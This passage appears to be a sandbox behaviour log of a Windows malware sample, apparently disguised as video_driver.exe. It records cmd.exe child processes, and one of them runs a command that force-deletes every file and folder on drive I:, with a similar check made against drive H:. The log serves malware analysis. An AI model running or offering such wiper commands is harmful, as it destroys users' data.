0 [0067.311] GetProcessHeap () returned 0x5f0000 [0067.311] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x12) returned 0x6033f0 [0067.311] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0067.311] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0067.312] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0067.312] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0067.312] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0067.312] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0067.312] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0067.312] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0067.312] GetProcessHeap () returned 0x5f0000 [0067.312] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x58) returned 0x603410 [0067.312] GetProcessHeap () returned 0x5f0000 [0067.312] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x14) returned 0x603470 [0067.312] GetProcessHeap () returned 0x5f0000 [0067.312] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x20) returned 0x6057e0 [0067.313] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0067.314] GetFullPathNameW (in: lpFileName="H:", nBufferLength=0x208, lpBuffer=0x28f7f0, lpFilePart=0x28f59c | out: lpBuffer="H:\\", lpFilePart=0x28f59c*=0x0) returned 0x3 [0067.315] wcsncmp (_String1="H:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -20 [0067.319] GetFileAttributesW (lpFileName="H:\\" (normalized: "h:")) returned 0xffffffff [0067.319] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.319] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.319] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.319] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.319] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.319] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.320] SetConsoleInputExeNameW () returned 0x1 [0067.320] GetConsoleOutputCP () returned 0x1b5 [0067.320] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.320] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.320] exit (_Code=0) Process: id = "53" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41168000" os_pid = "0x5f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"I:\" del /f /s /q \"I:\" & FOR /D %p IN (\"I:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 81 os_tid = 0x5e4 [0067.414] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afa14 | out: lpSystemTimeAsFileTime=0x2afa14*(dwLowDateTime=0x5fcd540, dwHighDateTime=0x1d62400)) [0067.414] GetCurrentProcessId () returned 0x5f4 [0067.414] GetCurrentThreadId () returned 0x5e4 [0067.414] GetTickCount () returned 0x114846c [0067.414] QueryPerformanceCounter (in: lpPerformanceCount=0x2afa0c | out: lpPerformanceCount=0x2afa0c*=18754722420) returned 1 [0067.416] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0067.416] __set_app_type (_Type=0x1) [0067.416] __p__fmode () returned 0x770331f4 [0067.416] __p__commode () returned 0x770331fc [0067.416] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0067.417] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0067.417] GetCurrentThreadId () returned 0x5e4 [0067.417] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e4) returned 0x60 [0067.417] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.417] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0067.418] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.418] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.418] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af9a4 | out: phkResult=0x2af9a4*=0x0) returned 0x2 [0067.418] VirtualQuery (in: lpAddress=0x2af9db, lpBuffer=0x2af974, dwLength=0x1c | out: lpBuffer=0x2af974*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.418] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af974, dwLength=0x1c | out: lpBuffer=0x2af974*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0067.418] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af974, dwLength=0x1c | out: lpBuffer=0x2af974*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0067.418] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af974, dwLength=0x1c | out: lpBuffer=0x2af974*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0067.418] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af974, dwLength=0x1c | out: lpBuffer=0x2af974*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0067.418] GetConsoleOutputCP () returned 0x1b5 [0067.419] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.419] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0067.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.419] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0067.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.419] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0067.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0067.419] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0067.420] _get_osfhandle (_FileHandle=0) returned 0x3 [0067.420] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0067.420] GetEnvironmentStringsW () returned 0x5a20f8* [0067.420] GetProcessHeap () returned 0x590000 [0067.420] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a2bd0 [0067.420] FreeEnvironmentStringsW (penv=0x5a20f8) returned 1 [0067.420] GetProcessHeap () returned 0x590000 [0067.421] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5a1898 [0067.421] GetEnvironmentStringsW () returned 0x5a20f8* [0067.421] GetProcessHeap () returned 0x590000 [0067.421] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a36a8 [0067.421] FreeEnvironmentStringsW (penv=0x5a20f8) returned 1 [0067.421] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae914 | out: phkResult=0x2ae914*=0x68) returned 0x0 [0067.421] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x0, lpData=0x2ae920*=0x0, lpcbData=0x2ae918*=0x1000) returned 0x2 [0067.421] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x4, lpData=0x2ae920*=0x1, lpcbData=0x2ae918*=0x4) returned 0x0 [0067.421] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x0, lpData=0x2ae920*=0x1, lpcbData=0x2ae918*=0x1000) returned 0x2 [0067.421] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x4, lpData=0x2ae920*=0x0, lpcbData=0x2ae918*=0x4) returned 0x0 [0067.421] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x4, lpData=0x2ae920*=0x40, lpcbData=0x2ae918*=0x4) returned 0x0 [0067.421] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x4, lpData=0x2ae920*=0x40, lpcbData=0x2ae918*=0x4) returned 0x0 [0067.421] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x0, lpData=0x2ae920*=0x40, lpcbData=0x2ae918*=0x1000) returned 0x2 [0067.422] RegCloseKey (hKey=0x68) returned 0x0 [0067.422] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae914 | out: phkResult=0x2ae914*=0x68) returned 0x0 [0067.422] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x0, lpData=0x2ae920*=0x40, lpcbData=0x2ae918*=0x1000) returned 0x2 [0067.422] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x4, lpData=0x2ae920*=0x1, lpcbData=0x2ae918*=0x4) returned 0x0 [0067.422] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x0, lpData=0x2ae920*=0x1, lpcbData=0x2ae918*=0x1000) returned 0x2 [0067.422] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x4, lpData=0x2ae920*=0x0, lpcbData=0x2ae918*=0x4) returned 0x0 [0067.422] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x4, lpData=0x2ae920*=0x9, lpcbData=0x2ae918*=0x4) returned 0x0 [0067.422] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x4, lpData=0x2ae920*=0x9, lpcbData=0x2ae918*=0x4) returned 0x0 [0067.422] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae91c, lpData=0x2ae920, lpcbData=0x2ae918*=0x1000 | out: lpType=0x2ae91c*=0x0, lpData=0x2ae920*=0x9, lpcbData=0x2ae918*=0x1000) returned 0x2 [0067.422] RegCloseKey (hKey=0x68) returned 0x0 [0067.422] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6d [0067.422] srand (_Seed=0x5eb34b6d) [0067.422] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"I:\" del /f /s /q \"I:\" & FOR /D %p IN (\"I:\") DO rmdir \"%p\" /s /q" [0067.422] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"I:\" del /f /s /q \"I:\" & FOR /D %p IN (\"I:\") DO rmdir \"%p\" /s /q" [0067.423] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.423] GetProcessHeap () returned 0x590000 [0067.423] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a20f8 [0067.423] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a2100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0067.423] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0067.423] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0067.423] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.423] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0067.423] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0067.423] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0067.423] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0067.423] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0067.423] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0067.423] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0067.423] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.424] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0067.424] GetProcessHeap () returned 0x590000 [0067.424] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a2bd0 | out: hHeap=0x590000) returned 1 [0067.424] GetEnvironmentStringsW () returned 0x5a2310* [0067.424] GetProcessHeap () returned 0x590000 [0067.424] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xae2) returned 0x5a4c70 [0067.424] FreeEnvironmentStringsW (penv=0x5a2310) returned 1 [0067.424] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0067.424] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.424] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0067.424] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0067.424] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0067.424] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0067.424] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0067.424] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0067.424] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0067.424] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0067.424] GetProcessHeap () returned 0x590000 [0067.424] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a17c8 [0067.424] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af6e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.425] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2af6e0, lpFilePart=0x2af6dc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2af6dc*="Desktop") returned 0x25 [0067.425] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.425] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af45c | out: lpFindFileData=0x2af45c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a5760 [0067.425] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0067.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2af45c | out: lpFindFileData=0x2af45c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a5760 [0067.425] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0067.425] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0067.425] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2af45c | out: lpFindFileData=0x2af45c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a5760 [0067.426] FindClose (in: hFindFile=0x5a5760 | out: hFindFile=0x5a5760) returned 1 [0067.426] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0067.426] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0067.426] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0067.426] GetProcessHeap () returned 0x590000 [0067.426] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4c70 | out: hHeap=0x590000) returned 1 [0067.426] GetEnvironmentStringsW () returned 0x5a4180* [0067.426] GetProcessHeap () returned 0x590000 [0067.426] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5fa0 [0067.426] FreeEnvironmentStringsW (penv=0x5a4180) returned 1 [0067.426] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0067.426] GetProcessHeap () returned 0x590000 [0067.426] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a17c8 | out: hHeap=0x590000) returned 1 [0067.426] GetProcessHeap () returned 0x590000 [0067.426] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x5a6ae0 [0067.427] GetProcessHeap () returned 0x590000 [0067.427] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xa0) returned 0x5a2e50 [0067.427] GetProcessHeap () returned 0x590000 [0067.427] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae0 | out: hHeap=0x590000) returned 1 [0067.427] GetConsoleOutputCP () returned 0x1b5 [0067.427] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0067.427] GetUserDefaultLCID () returned 0x409 [0067.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0067.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af820, cchData=128 | out: lpLCData="0") returned 2 [0067.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af820, cchData=128 | out: lpLCData="0") returned 2 [0067.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af820, cchData=128 | out: lpLCData="1") returned 2 [0067.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0067.428] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0067.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0067.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0067.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0067.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0067.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0067.429] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0067.429] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0067.429] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0067.429] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0067.431] GetProcessHeap () returned 0x590000 [0067.431] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x5a2ef8 [0067.431] GetConsoleTitleW (in: lpConsoleTitle=0x5a2ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0067.431] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0067.431] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0067.431] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0067.431] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0067.432] GetProcessHeap () returned 0x590000 [0067.432] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6ae0 [0067.432] GetProcessHeap () returned 0x590000 [0067.432] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaaf8 [0067.433] GetProcessHeap () returned 0x590000 [0067.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1a) returned 0x5a57e0 [0067.433] GetEnvironmentVariableW (in: lpName="p IN (\"I", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0067.433] _wcsicmp (_String1="p IN (\"I", _String2="CD") returned 13 [0067.433] _wcsicmp (_String1="p IN (\"I", _String2="ERRORLEVEL") returned 11 [0067.433] _wcsicmp (_String1="p IN (\"I", _String2="CMDEXTVERSION") returned 13 [0067.433] _wcsicmp (_String1="p IN (\"I", _String2="CMDCMDLINE") returned 13 [0067.433] _wcsicmp (_String1="p IN (\"I", _String2="DATE") returned 12 [0067.433] _wcsicmp (_String1="p IN (\"I", _String2="TIME") returned -4 [0067.433] _wcsicmp (_String1="p IN (\"I", _String2="RANDOM") returned -2 [0067.433] _wcsicmp (_String1="p IN (\"I", _String2="HIGHESTNUMANODENUMBER") returned 8 [0067.433] GetProcessHeap () returned 0x590000 [0067.433] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a57e0 | out: hHeap=0x590000) returned 1 [0067.433] GetProcessHeap () returned 0x590000 [0067.433] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaaf8 | out: hHeap=0x590000) returned 1 [0067.433] GetProcessHeap () returned 0x590000 [0067.433] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaaf8 [0067.433] GetProcessHeap () returned 0x590000 [0067.434] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5aaaf8 | out: hHeap=0x590000) returned 1 [0067.434] GetProcessHeap () returned 0x590000 [0067.434] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ae0 | out: hHeap=0x590000) returned 1 [0067.434] _wcsicmp (_String1="if", _String2=")") returned 64 [0067.434] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0067.434] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0067.434] _wcsicmp (_String1="IF", _String2="if") returned 0 [0067.434] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0067.434] GetProcessHeap () returned 0x590000 [0067.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3110 [0067.434] GetProcessHeap () returned 0x590000 [0067.434] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xe) returned 0x59ffc0 [0067.435] GetProcessHeap () returned 0x590000 [0067.435] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x20) returned 0x5a57e0 [0067.435] GetProcessHeap () returned 0x590000 [0067.435] RtlReAllocateHeap (Heap=0x590000, Flags=0x0, Ptr=0x5a57e0, Size=0x16) returned 0x5a1800 [0067.435] GetProcessHeap () returned 0x590000 [0067.435] RtlSizeHeap (HeapHandle=0x590000, Flags=0x0, MemoryPointer=0x5a1800) returned 0x16 [0067.436] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0067.436] GetProcessHeap () returned 0x590000 [0067.436] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x58) returned 0x5a3170 [0067.436] GetProcessHeap () returned 0x590000 [0067.436] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x14) returned 0x5a31d0 [0067.436] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0067.436] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0067.437] GetProcessHeap () returned 0x590000 [0067.437] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x12) returned 0x5a31f0 [0067.437] GetProcessHeap () returned 0x590000 [0067.437] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1c) returned 0x5a57e0 [0067.437] GetProcessHeap () returned 0x590000 [0067.437] 